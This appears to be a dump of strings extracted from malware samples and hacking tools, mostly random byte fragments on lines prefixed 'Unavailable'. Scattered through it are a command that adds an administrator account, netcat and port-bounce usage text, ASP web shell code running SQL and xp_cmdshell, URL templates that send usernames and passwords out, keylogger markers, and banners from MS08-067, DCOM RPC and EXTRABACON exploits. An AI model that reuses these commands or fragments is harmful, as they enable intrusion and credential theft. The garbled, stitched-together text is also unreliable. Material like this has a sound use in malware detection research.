Unavailable 78*qw
Unavailable 2r+r6
Unavailable d&&@
Unavailable %'=w
Unavailable o[<v
Unavailable ?uih
Unavailable (t$0a
Unavailable o~[63
Unavailable l{hq
Unavailable @88t
Unavailable edv8e>xd
Unavailable gpvp
Unavailable h+nd
Unavailable !satana!%s-tryexceptd:\lbetwmwy\uijeuqplfwub.pdbqfntvthbnow it's %i:%m%p.
Unavailable http://www.jmicron.co.tw0suckm3 from explorer.exe moth4fucka #@!\
Unavailable ]ksw
Unavailable j5"zwo
Unavailable [gk*
Unavailable r0vyh
Unavailable !,tz/
Unavailable @=%s
Unavailable k0@h
Unavailable g(fuf]a`a
Unavailable jzxt
Unavailable 2r>a
Unavailable a]c'
Unavailable c_(`
Unavailable >77:
Unavailable iza{|t);|
Unavailable tdlcc
Unavailable toyotpipe
Unavailable camdd
Unavailable 2*:n
Unavailable #fl[(
Unavailable @n,00dc
Unavailable bots\\bot5\\x64\\releasebot5\\release\\ism.pdbbot\\release\\ism.pdb\\bot fresh\\release\\bot/
Unavailable \$83
Unavailable b`a#
Unavailable nnkm
Unavailable .&z&
Unavailable d$,wp
Unavailable i[,b
Unavailable `eh vector copy constructor iterator'
Unavailable d$ph
Unavailable fj'w
Unavailable !ks}
Unavailable t$lf;
Unavailable %sg+
Unavailable (=?t
Unavailable 1+se
Unavailable tnhc
Unavailable w!5*?
Unavailable y)6`b
Unavailable `=lw
Unavailable z'mo
Unavailable &n5/
Unavailable @j@h0
Unavailable 4y9f
Unavailable f7l^
Unavailable jxj@
Unavailable yh.qx
Unavailable mgbf
Unavailable c3t#
Unavailable setthreadstackguarantee
Unavailable @.rsrc
Unavailable r'rr
Unavailable p;cd
Unavailable }+)!
Unavailable ffffff
Unavailable o0#v
Unavailable 2bxf
Unavailable fb9,nu
Unavailable `xmu;?
Unavailable ;=ds
Unavailable p9{a
Unavailable pec2
Unavailable fd9;u
Unavailable x<lp\ln
Unavailable c30m
Unavailable med)
Unavailable p]{8
Unavailable e!v`
Unavailable ;s?2
Unavailable (trivial173 by smt/smf)
Unavailable =, @
Unavailable l[f*
Unavailable ^j9]
Unavailable 'ybn
Unavailable t$8d
Unavailable d$ |
Unavailable volatile
Unavailable iavs
Unavailable a>noh
Unavailable 1a;m
Unavailable ug=z
Unavailable 00dck
Unavailable krvp
Unavailable ;m<e
Unavailable ,uw\
Unavailable c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
Unavailable d82u&h
Unavailable allocation number within this function:
Unavailable cq!&
Unavailable rar!frombase64stringulti.exer
Unavailable o+ul
Unavailable ;^!u
Unavailable s|yv
Unavailable ?`ybv
Unavailable m?{n6
Unavailable %\0@
Unavailable realpath
Unavailable i:pw
Unavailable .^r2
Unavailable t$ l
Unavailable addfontmemresourceexnamedescapecreatebitmapdeleteobject
Unavailable |l3x
Unavailable d$(h
Unavailable +a74b$
Unavailable .aq%h
Unavailable portions copyright (c) 1997-1999 lee hasiuk
Unavailable `vector vbase constructor iterator'
Unavailable ]y[e
Unavailable mp>r,
Unavailable haoq@neusoft.comqq2000b.exe\\qq2000b.exew
Unavailable @0.1`ha
Unavailable gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
Unavailable ;mzu7
Unavailable ehkq
Unavailable wd.`_
Unavailable xshareware-version exestealth, contact support@webtoolmaster.com - www.webtoolmaster.com
Unavailable )t$@
Unavailable sbbr
Unavailable @$@k
Unavailable g3}hd6zf
Unavailable l$(a
Unavailable z/g>
Unavailable h\:q:
Unavailable @v_;)
Unavailable [ci<?
Unavailable !lzb']
Unavailable `u*z
Unavailable 5$f@
Unavailable !`xn
Unavailable =~;wk
Unavailable getvolumeinformationa
Unavailable monday
Unavailable j6)\q
Unavailable k^1"*
Unavailable j,ry
Unavailable !zka
Unavailable '(
Unavailable x/'[x
Unavailable 6gtk
Unavailable 9b3y$c
Unavailable c:\windows\softwareprotector\
Unavailable powered by smartassembly 6u
Unavailable 7exl
Unavailable d$\h
Unavailable g_ru
Unavailable %s%s%p%s%zd%s%d%s
Unavailable qh\ @
Unavailable d8l2
Unavailable 3dmark database file`ht
Unavailable st1h
Unavailable loadresource
Unavailable 4=ep}mbl
Unavailable -h~ze"
Unavailable xntdeviceiocontrolfilentdll.dllmswsock.dllc:\\pj\\testing\\testing\\release\\whatthefuckingisgoingonhiman!kingisgoingonhiman!x
Unavailable tf7`p
Unavailable |$0a
Unavailable "(&e
Unavailable (d$ h
Unavailable the ordinal %u could not be located in the dynamic link library %sgetmodulehandleaodbc32.dlle
Unavailable rh:lmp?r
Unavailable yl`%
Unavailable g_tv
Unavailable 7.t?i
Unavailable rq*m
Unavailable /spo
Unavailable \nb4_tmp_0132454350\
Unavailable call extract(dnsps1, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\dns.ps1\")2
Unavailable h31415927tttts
Unavailable library/preferences/com.applemehrdadu
Unavailable drol
Unavailable pw(np
Unavailable tc!r
Unavailable jm0u
Unavailable et^,
Unavailable u(@u/_
Unavailable (00dc[
Unavailable t$@;
Unavailable ^)"t
Unavailable bvsdr)
Unavailable h\w@
Unavailable axr>k"
Unavailable bdgd
Unavailable \(\+
Unavailable p7!4.#
Unavailable pb-0b9&
Unavailable xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
Unavailable ylz#
Unavailable mx=g
Unavailable {f!l
Unavailable char32_t
Unavailable =x;|
Unavailable em,1
Unavailable 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
Unavailable )>+'j:
Unavailable <b~n
Unavailable 0*b)tr
Unavailable .00dc$
Unavailable v#xq
Unavailable fatalexitisc`
Unavailable )kkm
Unavailable "kqh^1-
Unavailable i/r zb
Unavailable n<k3v
Unavailable uh`d@
Unavailable ud>8
Unavailable %h0@
Unavailable `.rdata
Unavailable i;}m,
Unavailable !this program cannot be run in dos mode.
Unavailable expandenvironmentstringsw
Unavailable cklz
Unavailable 3o2c
Unavailable m^#q
Unavailable -)4d
Unavailable evf
Unavailable lzu9
Unavailable cipe
Unavailable d$(p
Unavailable virtualquery
Unavailable bh7(
Unavailable +|$(
Unavailable xd8py
Unavailable u+e3
Unavailable ]c+e
Unavailable uwavh
Unavailable e:i\
Unavailable `h````
Unavailable bdc helpsystemh
Unavailable @iz{
Unavailable fa9<\u
Unavailable gslzg
Unavailable -->got wmi process pid: %d this exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
Unavailable ri}$^
Unavailable l2gn
Unavailable tlem
Unavailable cofx
Unavailable f[<lb
Unavailable z@1:
Unavailable whu:
Unavailable wr\(
Unavailable a95bl765mng2gprsh
Unavailable j(#/
Unavailable g@hp
Unavailable vwauh
Unavailable m7{[
Unavailable 3apq
Unavailable -------------
Unavailable clpl
Unavailable b+r/
Unavailable w{&2z
Unavailable .>jtt
Unavailable vn8_
Unavailable .[-2
Unavailable enumsystemlocalesex
Unavailable 9dff
Unavailable a6x3|
Unavailable 0<rn
Unavailable exitprocess
Unavailable c"i0
Unavailable =,,&
Unavailable d$h9d$ s"
Unavailable tcpt7file`
Unavailable xvdj
Unavailable asqrvwu
Unavailable i-v*
Unavailable mrih
Unavailable zokn
Unavailable startwork
Unavailable willweiwei
Unavailable znuu
Unavailable n+$
Unavailable y)fd
Unavailable tvf9p
Unavailable #@ca
Unavailable lo%u
Unavailable r*\kmwmbk lg@r
Unavailable wxlt
Unavailable p@h~
Unavailable :3ty
Unavailable lvw3
Unavailable qb^8u
Unavailable <1~-<3~ <4t5<5t
Unavailable %s\\rundll32.exe \"%s\", shadowplaynvdisps.dll%snvdisps.dll\\winhlp32.exenvdisps_user.dat%snvdisps_user.datprogramdata\\rastls\\rastls.exeprogramdata\\rastls\\rundll32.exeprogramdata\\rastls\\svchost.exewindows\\system32\\regsvr32.exe4689windows\\system32\\mshta.exewindows\\system32\\windowspowershell\\v1.0\\powershell.exewindows\\system32\\wbem\\wmiprvse.exe%s=?getname&computer=^xjwfwcgrhdgelaa=jvdjtkrjuibtcplugpsexec.exewindows\\system32\\net.exewindows\\system32\\at.exeinvalid key length used to initialize blowfish.getpcproxyhandlerstartpcproxysetpcproxyhandler
Unavailable 1pmg
Unavailable stfo
Unavailable gk85
Unavailable this application cannot run with an active debugger in memory.
Unavailable d0r+z
Unavailable wq-@
Unavailable |$ i
Unavailable 0richwservice control manager_vsnwprintfroot agencyroot agency0startservicectrldispatchera\
Unavailable 1#snan
Unavailable nc/{^
Unavailable f:\\excalibur\\excalibur\\excalibur\\bin\\osabersvc.pdbcmd.exe /c md h
Unavailable ^j,0
Unavailable h|rc
Unavailable ddedata initialized (unicode), app strings are '%s' and '%s'
Unavailable wrong protocol type/post/download/post/echoj
Unavailable win7elevatev2\\x64\\release\\r
Unavailable ;;;i
Unavailable :qtiger324{user32.dlllogin.aspcheck.aspresult.aspupload.asp
Unavailable fjn9
Unavailable rtlunwindex
Unavailable |2b3
Unavailable wzre
Unavailable ##\\darkeyev3-suvw
Unavailable +m<7>
Unavailable xj9h
Unavailable t'h;
Unavailable {v6u
Unavailable 9r84
Unavailable ilbmbmhd
Unavailable noobyprotect se 1.2.0.0dt=
Unavailable sgrj
Unavailable dmt3
Unavailable vbeaf.drv
Unavailable d]jkj8
Unavailable i01wb
Unavailable vyds
Unavailable gt{3
Unavailable b#5
Unavailable _autoattackmain_frmiptoaddr!win32 .exe.xolehlp.dlldtcgettransactionmanagerexagetusernameapacketsendpacketarpsniffpcap_loopsyntax: %s [-i file] [-o file] [-m minlen] [-m maxlen] [-c minsets] -l -u -n -p pw-inspectori:o:m:m:c:lunpsp
Unavailable )t00dc
Unavailable 2ed3,e%
Unavailable vwukh
Unavailable @mr
Unavailable w`qy(y
Unavailable t$4vr
Unavailable *mlt* = %*ip* = %*victimo* = %*name* = %[start][data]we control your digital worldrc4initializerc4decrypts
Unavailable hok!,i
Unavailable l;||
Unavailable a0kh
Unavailable support@nirsoft.net0</requestedprivileges></security></trustinfo></assembly>pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
Unavailable sqrvwu
Unavailable r1.1.4
Unavailable 101wb
Unavailable h}w>
Unavailable fmc!`
Unavailable wt;vh
Unavailable h{9.v
Unavailable |:xxc
Unavailable 5bv%
Unavailable |md$@7
Unavailable !m3a
Unavailable iky*h
Unavailable _rx_
Unavailable sckuh
Unavailable omtlq
Unavailable l$pa
Unavailable uwhc
Unavailable compiled by: berotinypascal - (c) copyright 2006, benjamin 'bero' rosseaux sqv
Unavailable #c2 3
Unavailable ^p4j
Unavailable s 01wb
Unavailable t"<.u
Unavailable wmgp
Unavailable i+z@
Unavailable .~ny
Unavailable ?*u:h
Unavailable 9keg
Unavailable ?$g4
Unavailable f"!,=
Unavailable "uhy>"
Unavailable !4hh
Unavailable m3n3gatt1hack3rc
Unavailable e(hc
Unavailable ~t.9
Unavailable q{uk$
Unavailable okm9
Unavailable dispatchcommanddispatchevent^
Unavailable jmp0
Unavailable gf?.
Unavailable $yqd
Unavailable <trustinfo xmlnssrtwd@@515]5z5c
Unavailable p#f"g7
Unavailable #t53
Unavailable 8@tkh
Unavailable k6d!
Unavailable ,0b*
Unavailable hx @
Unavailable isprocessorfeaturepresent
Unavailable abcdefghijktornewforusomething illeagalrundll32 %s,rundlluninstalle
Unavailable g\#qy
Unavailable __thiscall
Unavailable lbcr
Unavailable t3qx
Unavailable ;asl
Unavailable p\cs
Unavailable -?qg
Unavailable %w@>
Unavailable e=^\6+4f+
Unavailable =l#itwx
Unavailable _>0=
Unavailable ntkatky
Unavailable 2ole32.dlll
Unavailable pcrypt
Unavailable `svw
Unavailable 9i01wb
Unavailable gi43
Unavailable t)c+
Unavailable qgy@a
Unavailable gu=_
Unavailable 6@w@1
Unavailable ^kuw
Unavailable wwwww
Unavailable <v0h
Unavailable ;%yr_{
Unavailable iih 8
Unavailable &79z
Unavailable setstdhandle
Unavailable rpx 1.obfuscated with dotfuscatorthis is a compiled autoit script. av researchers please email avsupport@autoitscript.com for support.tagg
Unavailable wqdw
Unavailable 28zy
Unavailable wqu3amjng
Unavailable to px
Unavailable <58'
Unavailable l$<pj
Unavailable -jcv
Unavailable <trustinfo xmlns="urn:schemas-microsoft-com:asm.v3">
Unavailable _ud(!
Unavailable agoz
Unavailable ~27x/4v+
Unavailable 5uqpwx,wp500
Unavailable ~tr2
Unavailable gp&pe
Unavailable n3xp
Unavailable ik\j
Unavailable http://www.vip80000.com/hot/index.htmlgetconnectstringcncert.safe.ssclone.dll(*.jpg;*.bmp;*.gif;*.ico;*.cur)|*.jpg;*.bmp;*.gif;*.ico;*.cur|jpgklock.dlle
Unavailable 6vov
Unavailable -'mb
Unavailable `m+x
Unavailable xe&h_=ry
Unavailable azfyk
Unavailable x$('n:
Unavailable l$0h3
Unavailable uh/$
Unavailable :-<&
Unavailable neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
Unavailable fmb!~
Unavailable i4h3;`
Unavailable vzvn:b?
Unavailable e o*c
Unavailable "p<m
Unavailable {3nj
Unavailable 9`^i
Unavailable /?10
Unavailable "zf)
Unavailable q0_l
Unavailable m5y>
Unavailable tuvz
Unavailable 62i01wb
Unavailable vg71*
Unavailable {ap\t
Unavailable st^;
Unavailable \>gdr
Unavailable h264
Unavailable 5`rk
Unavailable ~hi+
Unavailable |$8l
Unavailable 9.}i
Unavailable a*ve
Unavailable t;r
Unavailable >cy#c
Unavailable t_ooww3=xxwxpy50ppz5jqp_-ys,a1ea5y852cp4z4pp-pv40p-bou
Unavailable 807x
Unavailable s/v#q
Unavailable w%&c
Unavailable so3:
Unavailable ))<%b
Unavailable n"ql4t
Unavailable fe98t'
Unavailable p*`f
Unavailable bxsi
Unavailable http://www.wasabii.com.tw 0'wymajtec$tima stempijg sarviges ga -$g2ahdneafe1.syssotefehj3.sysmainsys64.sys\
Unavailable tpb9e
Unavailable [ eyf
Unavailable ?r;v
Unavailable ru_9
Unavailable {*eh
Unavailable {d+mb)
Unavailable 5l @
Unavailable \gt.
Unavailable ad1)/*
Unavailable (2"8
Unavailable u(d]f
Unavailable hpxc
Unavailable moc{jj
Unavailable upsqr
Unavailable ik@/d
Unavailable getprocessheap
Unavailable !%sja%g1\\\\.\\pipe\\x141_stdin\\\\.\\pipe\\x141_stdout\
Unavailable net serviceshellcreator2.propertiesset_ivsmartcopy2.propertieszhuframeworkunable to resolve [ %s ]. errorcode %dyour target's ip is : %sraw tcp socket created successfully.n
Unavailable \\systemroot\\system32\\ci.dll\\sysnative\\ci.dllmozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/36.0.1985.125 safari/537.36crtdll.dllinternetopena coolio, trying open %s029.hdlhttp.execontent-disposition: form-data; name=\"file1\"; filename=\"%s\"%allusersprofile%\\accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|ckanbh9fnmxgjcsbxx5nfs+8s7abcq==ckanbhfln1nxmccr0rlbmq==select * from moz_logins;makescr.dat%s\\mozilla\\firefox\\profiles.ini?moz-proxy://[%s-%s] title: %scforeign key mismatch - \"%w\" referencing \"%w\"windows 95 sr2\\|%s|0|0|c:\\users\\john\\desktop\\potplayer\\release\\potplayer.pdbpotplayer.dll\\update.datht_exploitht_exploitflash_exploit_exp1_fla/maintimelineexp2_fla/maintimeline_shellcode_32todo: unknown 32-bit targeth
Unavailable getmodulehandleexw
Unavailable 5z1@
Unavailable 1u,9
Unavailable ]30+
Unavailable hau?
Unavailable isdebuggerpresent
Unavailable hk#=\
Unavailable gh+a
Unavailable '[=i
Unavailable ukfo
Unavailable g[vs
Unavailable aqon.
Unavailable gv9e
Unavailable **gh
Unavailable xt6<m%g7k^d4.7xdtp28i!c3gz@0*3t@
Unavailable }!(!
Unavailable spd5j
Unavailable =s6)
Unavailable ~-qvd
Unavailable long
Unavailable pmg.
Unavailable 'p8gswse]
Unavailable 1.+b
Unavailable 3>fvw
Unavailable l$8h
Unavailable w9.'
Unavailable 9t6a
Unavailable rr"dl
Unavailable `hstalhthin
Unavailable a_a^a\_^
Unavailable qn/}
Unavailable ;|v+
Unavailable http://extcitrix.we11point.com/vpn/index.php?ref=1%systemroot%\\system32\\svchost.exe -k msupdatemanagement support team1dtoptoolz co.,ltd.0seoul1hello world!conin$setconsolemodegetenvironmentstringsgetfiletypeheapcreatevirtualfreegetoemcpflushfilebufferssetstdhandleextension: .jpgyahoo kec\\control\\zxplughttp://www.facebook.com/comment/update.exeshared a shell to %s:%s successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegset return time error = %d!set return time success!quit success!msn.klmwmsn.klmbms.klmerror %u while loading tsu.dll %lsgetmodulefilename() failed => %ut
Unavailable ^]yf
Unavailable ~01wb
Unavailable vr.>t
Unavailable iecomdll.datc
Unavailable ^<v7w
Unavailable <kha$
Unavailable km=#j
Unavailable 2#5s
Unavailable t$x^
Unavailable ro^^jozor
Unavailable strf
Unavailable e) ,
Unavailable 4tsp
Unavailable @8t$p@
Unavailable rb{0li6
Unavailable soj!w
Unavailable `yw#
Unavailable ecrnlgy
Unavailable fqfy
Unavailable k,=bf
Unavailable {+$.
Unavailable k=yi
Unavailable wwpack32 decompression routine version 1.12
Unavailable *68c
Unavailable 6^bp
Unavailable imn;
Unavailable d$5i
Unavailable v"st
Unavailable km1!
Unavailable 1v.%>
Unavailable h$sc
Unavailable 3!]negp
Unavailable du" c
Unavailable &^: l
Unavailable #z5m
Unavailable c/nu]
Unavailable <~~-
Unavailable .nr5
Unavailable get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
Unavailable copy_file_to_system.exemozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)!his=9!wn=!flof=!fil=!ps=i am so sad!i am so happy!jdk541please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!installlocationdisplayversiondisplaynamewininet.dll internetopena internetconnecta httpopenrequesta httpsendrequesta httpqueryinfoa internetreadfile internetclosehandle
Unavailable l$$2
Unavailable pr2*
Unavailable h+m?
Unavailable - rewritten by hdm last <hdm [at] metasploit.com>- usage: %s <target id> <target ip>- remote dcom rpc buffer overflow exploit- warning:this code is more like a dos tool!(modify by pingker)windows nt sp6 (chinese)- original code by flashsky and benjurry\
Unavailable :-"\w
Unavailable ;mor
Unavailable ckxxwn
Unavailable 93>g
Unavailable t$8a
Unavailable const
Unavailable wi)[
Unavailable vq^g
Unavailable software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
Unavailable :k\`l)
Unavailable steam_ker.dllfor /f %%a in (host.txt) do (for /f \"eol=s tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txtdel host.txt /qfor /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txtstart http.exe %%a %http%del result.txt s2.txt s1.txt nc [-options] hostname port[s] [ports] ... gethostpoop fuxoredvernotsupported%s [%s] %d (%s) `--%s' doesn't allow an argumentms08-067 exploit for cn by emm@ph4nt0m.orgmake smb connection error:%dsend payload over!maybe patched!rpcexceptioncode() = %up
Unavailable virtual
Unavailable /bbs/info.asp\\msinfo.exe%s\\%srcs.pdf\\aumlib.ini9/f30li5ubo5dnaddxg8s762tqy=
Unavailable 'u[d
Unavailable u)gg
Unavailable 00dc(
Unavailable s&kp
Unavailable r)"-
Unavailable qh.4
Unavailable getcommandlinew
Unavailable 37*f
Unavailable bk)x=
Unavailable tuxv
Unavailable "@^9
Unavailable &h]u$
Unavailable 2]8{
Unavailable <<6u
Unavailable cmd=getload&login=&run=ok&run=fail&removed=ok[iisend=0x%08x][recv:] 0x%08x %siiscmd error:%dnot support this function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
Unavailable guangzhou yuanluo technology co.guangzhou yuanluo technology co.,ltd$asahi kasei microdevices corporation0\
Unavailable cy4tottmpmtthvforrlmddnikx%s.identifier%d:%i64u:%s%s;%s%.2d-%.2d-%.4d[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d][backspace][tab][arrow left][arrow up][arrow right][arrow down][home][page up][page down][break][print screen][scroll lock][caps lock][alt][esc][ctrl+%c]n
Unavailable w(00dc
Unavailable 9*~83
Unavailable rof2z
Unavailable isequalguid
Unavailable snpo
Unavailable d$4d
Unavailable cli::pin_ptr<
Unavailable %w?t
Unavailable |!x[,
Unavailable }$ls
Unavailable setpixel
Unavailable 4e#r
Unavailable vol+
Unavailable cgk>1
Unavailable (fd~
Unavailable c:\\windows\\system32\\cmd.exeinflate 1.1.3 copyright 1995-1998 mark adlerbindercarrier.pdb\\stringfileinfo\\040904b0\\companyname\\stringfileinfo\\040904b0\\internalname\\stringfileinfo\\040904b0\\filedescriptioncreateobject(\"wscript.shell\").run \"%s %s\"tmp.vbstmp1.vbsfiremalv\\firemalv\
Unavailable [[[i
Unavailable azzymutex\
Unavailable g0%o
Unavailable &'(e
Unavailable t.x,
Unavailable a local variable was used before it was initialized
Unavailable ta?s
Unavailable ow)>wwdt
Unavailable h?,4
Unavailable a* $
Unavailable k.jj=,
Unavailable xl/vbaproject.bin
Unavailable h`>g,s
Unavailable wc#q
Unavailable r ce
Unavailable fxsu]
Unavailable :%:0:;:f:q:\\:p:|:6.666>6f6n6v6^6f6n6v6~66!6(6/666=6d6k6r6y6r6:71t83jl.bjg6!61666v6]6p62%2d2p2`2p2|242494@4g4n4u4\\4c4j4q4x49+92999@9g9n9u9\\9c9j9q9x94!4&43484e4j4w4\\4i4n4s45$5+52595@5g5n5u5\\5c5j5q51.252<2c2j2q2x2_2f2m2t2{28 8%818:8?8k8q8v8b8h8m8y89'93989=9b9k9p9u9z9c9n9s9:\":':,:8:=:b:r:z:`:e:v:}:=#=(=4=:=?=k=q=v=b=k=p=|== =*=1=8=?=f=m=t=[=b=i=p=w=~=3&3-343;3b3i3p3w3^3e3l3s3z3:!:(:/:6:=:i:n:s:`:f:k:x:~:cmdkajy==#=/=4=9=e=j=o=[=`=e=q=v={=
Unavailable cpes
Unavailable ker.%h
Unavailable 3)6{
Unavailable *loz
Unavailable zi/
Unavailable +rq*
Unavailable qwwl
Unavailable .xsq
Unavailable !c^z
Unavailable )zxk
Unavailable 7&t~
Unavailable |6~2|
Unavailable a8 t
Unavailable d6w(
Unavailable 00dcw
Unavailable bdvs},ge
Unavailable a a#
Unavailable _ey_q1s
Unavailable d$0d
Unavailable fvzn
Unavailable kma#v
Unavailable +68es|3y
Unavailable 8'>0
Unavailable y-]eaek
Unavailable \>(j
Unavailable 2!0j
Unavailable -0["x
Unavailable getmaingcqcdqbde@gcqgqydv_b}e\\dy@\\uufu^dcc_s[ud***
Unavailable 9{]f
Unavailable =#00dc
Unavailable b&3|8
Unavailable #,ug
Unavailable pn{i4
Unavailable yt(;].*
Unavailable :54o
Unavailable v0q[s
Unavailable ;h$c
Unavailable ~zwo
Unavailable 0hoc
Unavailable ",yu
Unavailable .data
Unavailable 4e[%n
Unavailable d$0fd
Unavailable --av
Unavailable comparestringex
Unavailable hlgibg
Unavailable b8sq
Unavailable sysinit
Unavailable =m_g
Unavailable is,!kx
Unavailable ?xs=a
Unavailable mbvo
Unavailable >2hk
Unavailable ldexp
Unavailable advj
Unavailable n+rp
Unavailable host: %ws:%dschannel.dll\\microsoft\\internet explorer\\conhost.exe\\microsoft\\internet explorer\\dll2.xor\\microsoft\\internet explorer\\hook.dll\\microsoft\\internet explorer\\main.dll\\microsoft\\internet explorer\\nvsvc.exe\\microsoft\\internet explorer\\sbiedll.dll\\microsoft\\internet explorer\\mon\\microsoft\\internet explorer\\runas.exesoftware\\360safe\\liveupsoftware\\360safesoftware\\kingsoft\\antivirussoftware\\avira\\avira destopsoftware\\rising\\ravsoftware\\jiangminsoftware\\micropoint\\anti-attackf
Unavailable z[$p
Unavailable aaaaaaia
Unavailable $eyf/
Unavailable t$(i;
Unavailable r00dc
Unavailable e"wo
Unavailable >$57
Unavailable 5h @
Unavailable r'z
Unavailable ,hy9
Unavailable +tq&d
Unavailable !mpy%
Unavailable d$dd
Unavailable b&thu
Unavailable hl @
Unavailable pswh
Unavailable (/mfy
Unavailable pxll[;
Unavailable \$$;
Unavailable qivk
Unavailable %-)#[
Unavailable fmhf{
Unavailable ibv9
Unavailable 9 excalibur (c) by forgot/us/dfcg f
Unavailable d$@e3
Unavailable cdr8
Unavailable 0g&5}
Unavailable ss[r
Unavailable yyutvwh
Unavailable )csp
Unavailable dstub
Unavailable d$0i
Unavailable |$8h
Unavailable szdd
Unavailable (t$ph
Unavailable ~lh]
Unavailable d$(hdtc
Unavailable "`<v1
Unavailable yhqb
Unavailable k}-t
Unavailable shellexecutewgetenvironmentvariablewsizeofresourcelockresourceloadresourcefindresourcewr
Unavailable %userprofile%\\iexpl0re.exe\"<770j ((\\users\\%s\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\iexpl0re.lnk\\documents and settings\\%s\\application data\\microsoft\\internet explorer\\iexpl0re.exeloaderv5.dllpost /index%0.9d.asp http/1.1get /search?n=%0.9d&dude_am_i_sharp-3.14159265358979x6.626176who_a_r_e_you?2.99792458x1.25663706143592bastard_&&_bitches_%0.8xc:\\bbb\\eee.txt
Unavailable qft"\
Unavailable `vua`
Unavailable t$ qrvvv
Unavailable h4ym-~7
Unavailable y[_^
Unavailable 32.dadva
Unavailable _filbuf
Unavailable processuseraccountss
Unavailable 7txwi
Unavailable 3$k#
Unavailable hhfc
Unavailable _g0x
Unavailable gk+zjsvd
Unavailable p~{%
Unavailable i[d|g
Unavailable vw8s?
Unavailable m+(&
Unavailable j4w2
Unavailable ~,3ff
